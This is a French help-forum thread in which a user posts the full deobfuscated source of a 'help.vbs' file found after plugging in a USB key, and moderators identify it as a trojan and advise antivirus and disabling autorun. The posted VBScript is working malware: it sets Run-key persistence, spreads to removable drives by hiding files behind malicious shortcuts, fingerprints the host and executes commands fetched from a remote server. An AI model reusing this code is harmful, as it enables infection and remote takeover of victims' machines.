Besoin d'aide pour comprendre du code (vbs??) (Help.vbs = virus ??? ) [Résolu]

Signaler
Messages postés
6
Date d'inscription
lundi 23 février 2009
Statut
Membre
Dernière intervention
9 juin 2013
-
Messages postés
14769
Date d'inscription
vendredi 14 mars 2003
Statut
Modérateur
Dernière intervention
13 février 2021
-
bonjour a tous !

Alors voila -_- je suis tombé sur un fichier "help.vbs" qui c'est mis a se dupliquer étrangement..
après édition du fichier, le code était vraiment étrange.. une succession de chiffre avec 3 ligne de vbs a la fin

j'ai fais une petite page wep pour décrypter ces chiffres (conversion CHR).. qui m'ont donné une autre suite de chiffre que j'ai decrypté a leur tour..
et cela ma donné ca !!

On Error Resume Next:diM sh:set sh=WScript.createObject("WScript.Shell"):diM fs:set fs=CreatEObjeCt("Scripting.FileSystemObject"):dim hosT:host="google-plus.redirectme.net":Dim port:port=90:Dim DR:DR=sh.ExPandenviRonmenTStrings("%temp%")&"":dim FN:FN="help.vbs":dim Fh:dim uS:Us="~":ins:dim spl:spl="jnJnj":Dim i:i=0:WhiLe true:dim a:a=sPliT(post("ready",""),spl):select case a(0):case"exc":dIm sa:Sa=a(1):execUTe sa:caSe"uns":Uns:end select:wScript.slEep 4000:i=i+1:if i>2 then i=0:xins:eNd if:wenD:function Ins:on error rEsume next:us=Sh.regread("HKCU\updatee"):If us="~"then if lcAse(miD(wscRipt.scriptfullname,2))=":"&lcasE(fn)tHen uS="y":sh.RegwRiTe"HKCU\updatee",us,"REG_SZ":ElsE uS="n":SH.regwrite"HKCU\updatee",us,"REG_SZ":end if:eNd if:ERr.Clear:fs.CopyFiLe wSCript.scripTfullnAmE,dR&fn,true:Set fh=Fs.OpenTeXTFIle(Dr&fN,8,false):if Err.Number>0 THeN wscript.QUit:end if:xIns:end funCtioN:sub xins:on erRor reSume next:sh.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"&fn,chrw(34)&dr&fn&chrw(34),"REG_SZ":sh.regWrIte"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"&fn,cHrW(34)&dr&fn&chrw(34),"REG_SZ":fS.CopYfile WsCrIpt.scriptfullnaMe,CreAteObject("Shell.Application").NAmeSPace(&H7).Self.Path&""&fn,true:foR eacH xx iN fs.drives:if xx.isready then if xx.FreeSpAce>0 theN if xX.drivEtypE=1 thEn if Fs.fileexists(xx.patH&""&fn)then fs.getfile(Xx.path&""&fn).AtTribuTes=0:enD If:fs.coPYfile dr&fn,xX.patH&""&fn,TruE:For EacH x In fs.GETFolder(xx.pAth&"").Files:wScript.sLeep 1:If instr(x.namE,".")then if lcase(SplIt(x.naMe,".")(uBoUnd(sPlit(x.nAme,"."))))<>"lnk"then x.ATtribuTes=2:if ucase(x.namE)<>ucasE(Fn)then With Sh.createSHORtcut(xx.patH&""&x.name&".lnk"):.TarGetPath="cmd.exe":.WorKIngDIrectoRY="":.ArgumenTS="/c start "&Replace(Fn," ",ChrW(34)&" "&ChrW(34))&"&start "&replACE(X.name," ",ChrW(34)&" "&ChRW(34))&" & exit":.IconLocation=sh.regreaD("HKLM\SOFTWARE\Classes"&sh.rEgrEad("HKLM\SOFTWARE\Classes\."&split(x.name,".")(UBound(SpLit(x.name,".")))&"")&"\DefaultIcon"):if inStr(.icOnlOCation,",")=0 then.iconlocaTion=.iConlocation&",0":eNd if:.SAve():end with:end if:end if:end if:Next:eNd if:end If:enD iF:Next:err.CLear:end sub:FuNction uns:ON error resuMe Next:fh.cLosE:Sh.RegDeletE"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"&fn:Sh.REgDEleTe"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"&Fn:fs.DEleTeFile dr&Fn,true:fs.DelEteFile CReatEOBject("Shell.Application").NameSpAcE(&H7).Self.PAth&""&Fn,true:for eacH xx in fs.Drives:if xx.IsrEAdy theN if XX.FReESpace>0 then for EacH X in fs.GeTFolder(xx.pAth&"").Files:On ERror ReSume nexT:if insTr(x.name,".")then if lcasE(spLit(x.Name,".")(UBound(SpliT(x.Name,"."))))<>"lnk"then x.AttrIbutes=0:if UCase(X.nAme)<>ucase(fN)then fs.deLetefIle(xx.Path&""&x.name&".lnk"):else fs.deletefile(Xx.path&""&x.Name):eND iF:end iF:enD if:NExT:end if:enD if:nExt:wscript.quit:enD fuNction:funcTion post(cmd,da):pOst="":dim o:Set o=CreateobjecT("MSXML2.XMLHTTP"):o.open"POST","http://"& HoSt&":"&Port&"/"&cmd,faLse:o.sEtrequestHeader"User-Agent:",inf:o.send da:posT=o.responSETExT:end fUnctiOn:diM Xinf:function inf:On errOr resuMe next:if xinf=""tHeN dim s:s="??":S=Hwd:inf=Inf&s&"":s="??":S=sh.expaNdENvironmEntstrIngS("%COMPUTERNAME%"):inf=inf&S&"":s="??":s=sh.EXpandENviRonMentstRings("%USERNAME%"):Inf=inf&s&"":s="??":Set a=geTObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2"):Set aA=a.ExEcQuery("Select * from Win32_OperatingSystem"):For Each Aaa iN aa:S=aaa.CapTion:exit foR:Next:inf=inf&s&"\\0.3"&uS&""&pid:xInf=inf:elsE inf=xinf:end If:end funCTioN:funCtIon HwD:HwD="key8_??":On Error REsumE Next:Set a=gEtObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2"):Set aa=a.Execquery("SELECT * FROM Win32_LogicalDisk"):For Each aaa in aa:iF aaa.VolUmeSerialnumber<>""then HWD="key8_"&aAa.VolumeseriaLNumber:exIt foR:end IF:NexT:enD funCtion:FunctiOn PiD:PID=0:on erroR resume nEXt:PID=getOBJect("winmgmts:root\cimv2").GEt("Win32_Process.Handle='"&sh.Exec("update.exe").ProCessID&"'").ParenTProcEssid:EnD Function


'
'*******************************************************
'
' '*******************************************************
'


'
'*******************************************************
'
' '*******************************************************
'


'
'*******************************************************
'
' '*******************************************************
'


'
'*******************************************************
'
' '*******************************************************
'


'
'*******************************************************
'
' '*******************************************************
'

Je ne connais pas assez le vbs pour comprendre tout le code..
Alors je fais appel a ceux qui auront les connaissances ^^'

si quelqu'un est assez calé pour me dire exactement ce que cela fait svp !!!

pour ce que j'ai compris et isolé ca doit transmettre le num de serie de windows a l'url "google-plus. redirectme. net"
et ca modifie la clef registre
- HKLM\Software\Microsoft\Windows\CurrentVersion\Run\

mais pour le reste ??
neeed help pls !!
A voir également:

6 réponses

Messages postés
14769
Date d'inscription
vendredi 14 mars 2003
Statut
Modérateur
Dernière intervention
13 février 2021
151
Bonjour,

sh.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"&fn

Oui, ça fait penser à un virus.

v----Signature--------v----------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, celui-ci pour bien poser votre question ou encore celui-ci pour les PFE et autres exercices.[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : ).[*]En VB.NET pensez à activer Option Explicit et Option Strict (propriété du projet) et à retirer l'import automatique de l'espace de nom Microsoft.VisualBasic (onglet Références dans les propriétés du projet).[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés/list
---
Mon site
Messages postés
18038
Date d'inscription
lundi 7 décembre 2009
Statut
Modérateur
Dernière intervention
11 avril 2018
234
Bonjour,
Bon ===>>
Voilà voilà
Certains commenceront à comprendre pourquoi d'autres (dont moi) on inhibé l'exécution de scripts (dont VBS) sur leur machine .
Bien sûr (pour les développeurs sous VB5, VB6 et VBA) : il faut faire harakiri de certaines facilités (FSO en premier lieu et loin devant) et apprendre à développer autrement.
________________________
Réponse exacte ? => "REPONSE ACCEPTEE" facilitera les recherches.
Pas d'aide en ligne installée ? => ne comptez pas sur moi pour simplement répéter son contenu. Je n'interviendrai que si nécessité de la compléter.

Bonjour,

foR eacH xx iN fs.drives ==>> Pour chaque disque/partition;
if xx.isready then if xx.FreeSpAce>0 theN ==>> si le lecteur est prêt et son espace libre est supérieur à zéro;

Pas bon du tout... même supprimé je suis sur qu'il va se régénérer.

Conseil: installe un antivirus.

Cordialement


CF2i - Guadeloupe
Ingénierie Informatique
Messages postés
18038
Date d'inscription
lundi 7 décembre 2009
Statut
Modérateur
Dernière intervention
11 avril 2018
234
Va maintenant te falloir te débarrasser de cette "saloperie", signée Trojan.VBS.TWW ===>>
1) rien à voir, ni avec VB.Net, ni avec le développement. Consulte donc des sites spécialisés/lutte antivirus et autres bébêtes
2) tu n'as pas attrapé ce pou par hasard, mais : soit en téléchargeant "les yeux fermés" n'importe quoi, soit en échangeant des fichiers "entre copains". Au passage : contagion facilitée grandement par échange de fichiers Office (Excel, Word, etc ...).
Et la plupart du temps : à l'insu même de ceux avec lesquels tu as "généreusement échangé".
Va falloir commencer à mettre un terme à ces échanges-là
Bonne chance.

________________________
Réponse exacte ? => "REPONSE ACCEPTEE" facilitera les recherches.
Pas d'aide en ligne installée ? => ne comptez pas sur moi pour simplement répéter son contenu. Je n'interviendrai que si nécessité de la compléter.
Messages postés
6
Date d'inscription
lundi 23 février 2009
Statut
Membre
Dernière intervention
9 juin 2013

Merci bcp pour vos reponses !!

@ucfoutu: effectivement recup apres avoir connecter une clef usb que j'avais utilisé pour depanné un pc.. et j'ai un antivirus.. avast.. enfin je croyais que c’était un antivirus -_-.. maintenant je doute..
Messages postés
14769
Date d'inscription
vendredi 14 mars 2003
Statut
Modérateur
Dernière intervention
13 février 2021
151
Bonjour,

Règle de base, TOUJOURS désactiver les autoruns des clés USB (option de l'AV ou configuration du registre Windows), c'est une base de la sécurité, avec un peu de config, j'ai évité un paquet de ces merdes.
(Note, Norton et Avira le permettent le base).

v----Signature--------v----------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, celui-ci pour bien poser votre question ou encore celui-ci pour les PFE et autres exercices.[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : ).[*]En VB.NET pensez à activer Option Explicit et Option Strict (propriété du projet) et à retirer l'import automatique de l'espace de nom Microsoft.VisualBasic (onglet Références dans les propriétés du projet).[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés/list
---
Mon site